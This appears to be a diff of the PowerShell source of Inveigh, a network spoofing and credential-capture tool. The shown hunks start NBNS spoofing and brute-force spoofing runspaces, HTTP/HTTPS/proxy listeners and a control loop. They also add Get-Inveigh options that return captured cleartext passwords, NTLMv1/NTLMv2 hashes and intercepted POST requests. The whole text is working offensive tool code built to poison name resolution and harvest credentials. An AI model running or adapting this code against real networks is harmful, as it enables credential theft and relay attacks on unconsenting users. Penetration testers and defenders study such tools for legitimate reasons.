$NBNS_spoofer_powershell.AddScript($NBNS_spoofer_scriptblock).AddArgument($Inspect).AddArgument( + $NBNS_response_message).AddArgument($SpooferIP).AddArgument($NBNSTypes).AddArgument( + $SpooferHostsReply).AddArgument($SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument( + $SpooferIPsIgnore).AddArgument($NBNSTTL) > $null + $NBNS_spoofer_powershell.BeginInvoke() > $null +} + +# NBNS Brute Force Spoofer Startup Function +function NBNSBruteForceSpoofer() +{ + $NBNS_bruteforce_spoofer_runspace = [RunspaceFactory]::CreateRunspace() + $NBNS_bruteforce_spoofer_runspace.Open() + $NBNS_bruteforce_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) + $NBNS_bruteforce_spoofer_powershell = [PowerShell]::Create() + $NBNS_bruteforce_spoofer_powershell.Runspace = $NBNS_bruteforce_spoofer_runspace + $NBNS_bruteforce_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null + $NBNS_bruteforce_spoofer_powershell.AddScript($NBNS_bruteforce_spoofer_scriptblock).AddArgument( + $SpooferIP).AddArgument($NBNSBruteForceHost).AddArgument($NBNSBruteForceTarget).AddArgument( + $NBNSBruteForcePause).AddArgument($NBNSTTL) > $null + $NBNS_bruteforce_spoofer_powershell.BeginInvoke() > $null +} + +# Control Loop Startup Function +function ControlLoop() +{ + $control_runspace = [RunspaceFactory]::CreateRunspace() + $control_runspace.Open() + $control_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) + $control_powershell = [PowerShell]::Create() + $control_powershell.Runspace = $control_runspace + $control_powershell.AddScript($shared_basic_functions_scriptblock) > $null + $control_powershell.AddScript($control_scriptblock).AddArgument($ConsoleQueueLimit).AddArgument( + $NBNSBruteForcePause).AddArgument($RunCount).AddArgument($RunTime) > $null + $control_powershell.BeginInvoke() > $null +} + # End Startup Functions # Startup Enabled Services # HTTP Server Start -if($inveigh.HTTP -or $inveigh.HTTPS) +if($HTTP -eq 'Y') { HTTPListener } -# Sniffer/Spoofer Start - always enabled -SnifferSpoofer +# HTTPS Server Start +if($HTTPS -eq 'Y') +{ + HTTPSListener +} + +# Proxy Server Start +if($Proxy -eq 'Y') +{ + ProxyListener +} +# Sniffer/Spoofer Start +if(($LLMNR -eq 'Y' -or $mDNS -eq 'Y' -or $NBNS -eq 'Y' -or $SMB -eq 'Y' -or $Inspect) -and $elevated_privilege) +{ + SnifferSpoofer +} +elseif(($LLMNR -eq 'Y' -or $mDNS -eq 'Y' -or $NBNS -eq 'Y' -or $SMB -eq 'Y') -and !$elevated_privilege) +{ + + if($LLMNR -eq 'Y') + { + LLMNRSpoofer + } + + if($mDNS -eq 'Y') + { + mDNSSpoofer + } + + if($NBNS -eq 'Y') + { + NBNSSpoofer + } + + if($NBNSBruteForce -eq 'Y') + { + NBNSBruteForceSpoofer + } + +} + +# NBNSBruteForce Spoofer Start +if($NBNSBruteForce -eq 'Y') +{ + NBNSBruteForceSpoofer +} + +# Control Loop Start +if($ConsoleQueueLimit -ge 0 -or $inveigh.file_output -or $NBNSBruteForcePause -or $RunCount -or $RunTime) +{ + ControlLoop +} + +# Console Output Loop if($inveigh.console_output) { @@ -2131,55 +4082,46 @@ if($inveigh.console_output) while($inveigh.console_queue.Count -gt 0) { - if($inveigh.output_stream_only) - { - Write-Output($inveigh.console_queue[0] + $inveigh.newline) - $inveigh.console_queue.RemoveAt(0) - } - else + switch -wildcard ($inveigh.console_queue[0]) { - switch -wildcard ($inveigh.console_queue[0]) + {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"} { + Write-Warning ($inveigh.console_queue[0] + $inveigh.newline) + $inveigh.console_queue.RemoveAt(0) + } - "* written to *" - { - - if($inveigh.file_output) - { - Write-Warning $inveigh.console_queue[0] - } - - $inveigh.console_queue.RemoveAt(0) - } + {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"} + { - "* for relay *" + if($ConsoleOutput -eq 'Y') { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveAt(0) + Write-Output ($inveigh.console_queue[0] + $inveigh.newline) } - "*SMB relay *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveAt(0) - } + $inveigh.console_queue.RemoveAt(0) - "* local administrator *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveAt(0) - } + } - default + {$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"} + { + + if($ConsoleOutput -ne "Low") { - Write-Output $inveigh.console_queue[0] - $inveigh.console_queue.RemoveAt(0) + Write-Output ($inveigh.console_queue[0] + $inveigh.newline) } + $inveigh.console_queue.RemoveAt(0) + } - } + default + { + Write-Output ($inveigh.console_queue[0] + $inveigh.newline) + $inveigh.console_queue.RemoveAt(0) + } + + } } @@ -2207,6 +4149,24 @@ if($inveigh.console_output) { Write-Output("$(Get-Date -format 's') - No cleartext credentials have been captured" + $inveigh.newline) } + + if($inveigh.POST_request_list.Count -gt 0) + { + Write-Output("$(Get-Date -format 's') - Current unique POST request captures:" + $inveigh.newline) + $inveigh.POST_request_list.Sort() + + foreach($unique_POST_request in $inveigh.POST_request_list) + { + if($unique_POST_request -ne $unique_POST_request_last) + { + Write-Output($unique_POST_request + $inveigh.newline) + } + + $unique_POST_request_last = $unique_POST_request + } + + Start-Sleep -m 5 + } if($inveigh.NTLMv1_list.Count -gt 0) { @@ -2306,95 +4266,90 @@ Stop-Inveigh will stop all running Inveigh functions. if($inveigh) { - if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) + if($inveigh.running -or $inveigh.relay_running) { - if($inveigh.HTTP_listener.IsListening) + if($inveigh.HTTPS -and !$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete)) { - $inveigh.HTTP_listener.Stop() - $inveigh.HTTP_listener.Close() - } - - if($inveigh.unprivileged_running) - { - $inveigh.unprivileged_running = $false - Start-Sleep -s 5 - Write-Output("Inveigh Unprivileged exited at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Unprivileged exited") > $null - if($inveigh.file_output) + try + { + $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") + $certificate_store.Open('ReadWrite') + $certificates = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer}) + + ForEach($certificate in $certificates) + { + $certificate_store.Remove($certificate) + } + + $certificate_store.Close() + } + catch { - "$(Get-Date -format 's') - Inveigh Unprivileged exited" | Out-File $Inveigh.log_out_file -Append + Write-Output("SSL Certificate Deletion Error - Remove Manually") + + if($inveigh.file_output) + { + "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null + } + } } if($inveigh.relay_running) { - $inveigh.relay_running = $false - Write-Output("Inveigh Relay exited at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null if($inveigh.file_output) { "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append } + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null + } + + Write-Output("Inveigh Relay exited at $(Get-Date -format 's')") + $inveigh.relay_running = $false + } if($inveigh.running) { - $inveigh.running = $false - Write-Output("Inveigh exited at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null if($inveigh.file_output) { "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append } - } + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null + } + + Write-Output("Inveigh exited at $(Get-Date -format 's')") + $inveigh.running = $false + + } + $inveigh.HTTPS = $false + Start-Sleep -S 5 } else { Write-Output("There are no running Inveigh functions") } - - if($inveigh.HTTPS) - { - & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null - try - { - $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") - $certificate_store.Open('ReadWrite') - $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$FALSE)[0] - $certificate_store.Remove($certificate) - $certificate_store.Close() - } - catch - { - Write-Output("SSL Certificate Deletion Error - Remove Manually") - $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null - - if($inveigh.file_output) - { - "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append - } - - } - } - - $inveigh.HTTP = $false - $inveigh.HTTPS = $false -} -else -{ - Write-Output("There are no running Inveigh functions")|Out-Null } -} +} function Get-Inveigh { @@ -2403,11 +4358,20 @@ function Get-Inveigh Get-Inveigh will get stored Inveigh data from memory. .PARAMETER Console -Get queued console output. This is also the default if no parameters are set. +Get queued console output. This is also the default if no parameters are set. + +.PARAMETER Learning +Get valid hosts discovered through spoofer learning. .PARAMETER Log Get log entries. +.PARAMETER Cleartext +Get captured cleartext credentials. + +.PARAMETER CleartextUnique +Get unique captured cleartext credentials. + .PARAMETER NTLMv1 Get captured NTLMv1 challenge/response hashes. @@ -2426,20 +4390,20 @@ Get the first captured NTLMv2 challenge/response for each unique account. .PARAMETER NTLMv2Usernames Get IP addresses and usernames for captured NTLMv2 challenge/response hashes. -.PARAMETER Cleartext -Get captured cleartext credentials. +.PARAMETER POSTRequest +Get captured POST requests. -.PARAMETER CleartextUnique -Get unique captured cleartext credentials. - -.PARAMETER Learning -Get valid hosts discovered through spoofer learning. +.PARAMETER POSTRequestUnique +Get unique captured POST request. #> [CmdletBinding()] param ( + [parameter(Mandatory=$false)][Switch]$Cleartext, + [parameter(Mandatory=$false)][Switch]$CleartextUnique, [parameter(Mandatory=$false)][Switch]$Console, + [parameter(Mandatory=$false)][Switch]$Learning, [parameter(Mandatory=$false)][Switch]$Log, [parameter(Mandatory=$false)][Switch]$NTLMv1, [parameter(Mandatory=$false)][Switch]$NTLMv2, @@ -2447,9 +4411,8 @@ param [parameter(Mandatory=$false)][Switch]$NTLMv2Unique, [parameter(Mandatory=$false)][Switch]$NTLMv1Usernames, [parameter(Mandatory=$false)][Switch]$NTLMv2Usernames, - [parameter(Mandatory=$false)][Switch]$Cleartext, - [parameter(Mandatory=$false)][Switch]$CleartextUnique, - [parameter(Mandatory=$false)][Switch]$Learning, + [parameter(Mandatory=$false)][Switch]$POSTRequest, + [parameter(Mandatory=$false)][Switch]$POSTRequestUnique, [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter ) @@ -2470,30 +4433,7 @@ if($Console -or $PSBoundParameters.Count -eq 0) switch -wildcard ($inveigh.console_queue[0]) { - "* written to *" - { - - if($inveigh.file_output) - { - Write-Warning $inveigh.console_queue[0] - } - - $inveigh.console_queue.RemoveAt(0) - } - - "* for relay *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveAt(0) - } - - "*SMB relay *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveAt(0) - } - - "* local administrator *" + {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"} { Write-Warning $inveigh.console_queue[0] $inveigh.console_queue.RemoveAt(0) @@ -2584,6 +4524,16 @@ if($CleartextUnique) Write-Output $inveigh.cleartext_list | Get-Unique } +if($POSTRequest) +{ + Write-Output $inveigh.POST_request_list +} + +if($POSTRequestUnique) +{ + Write-Output $inveigh.POST_request_list | Get-Unique +} + if($Learning) { Write-Output $inveigh.valid_host_list @@ -2596,73 +4546,74 @@ function Watch-Inveigh <# .SYNOPSIS Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell. + +.PARAMETER ConsoleOutput +(Medium,Low) Medium and Low can be used to reduce output. #> +[CmdletBinding()] +param +( + [parameter(Mandatory=$false)][ValidateSet("Low","Medium")][String]$ConsoleOutput = "Y", + [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter +) + if($inveigh.tool -ne 1) { - if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) + if($inveigh.running -or $inveigh.relay_running) { Write-Output "Press any key to stop real time console output" $inveigh.console_output = $true - :console_loop while((($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output)) + :console_loop while((($inveigh.running -or $inveigh.relay_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output)) + { + + while($inveigh.console_queue.Count -gt 0) { - while($inveigh.console_queue.Count -gt 0) + switch -wildcard ($inveigh.console_queue[0]) { - if($inveigh.output_stream_only) + {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"} { - Write-Output($inveigh.console_queue[0] + $inveigh.newline) + Write-Warning $inveigh.console_queue[0] $inveigh.console_queue.RemoveAt(0) } - else + + {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"} { - switch -wildcard ($inveigh.console_queue[0]) + if($ConsoleOutput -eq 'Y') { - - "* written to *" - { + Write-Output $inveigh.console_queue[0] + } - if($inveigh.file_output) - { - Write-Warning $inveigh.console_queue[0] - } + $inveigh.console_queue.RemoveAt(0) - $inveigh.console_queue.RemoveAt(0) - } + } - "* for relay *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveAt(0) - } + {$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"} + { + + if($ConsoleOutput -ne "Low") + { + Write-Output $inveigh.console_queue[0] + } - "*SMB relay *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveAt(0) - } + $inveigh.console_queue.RemoveAt(0) - "* local administrator *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveAt(0) - } + } - default - { - Write-Output $inveigh.console_queue[0] - $inveigh.console_queue.RemoveAt(0) - } + default + { + Write-Output $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } - } + } - } - - } + } if([Console]::KeyAvailable) { @@ -2697,7 +4648,7 @@ Clear-Inveigh will clear Inveigh data from memory. if($inveigh) { - if(!$inveigh.running -and !$inveigh.relay_running -and !$inveigh.unprivileged_running) + if(!$inveigh.running -and !$inveigh.relay_running) { Remove-Variable inveigh -scope global Write-Output "Inveigh data has been cleared from memory" |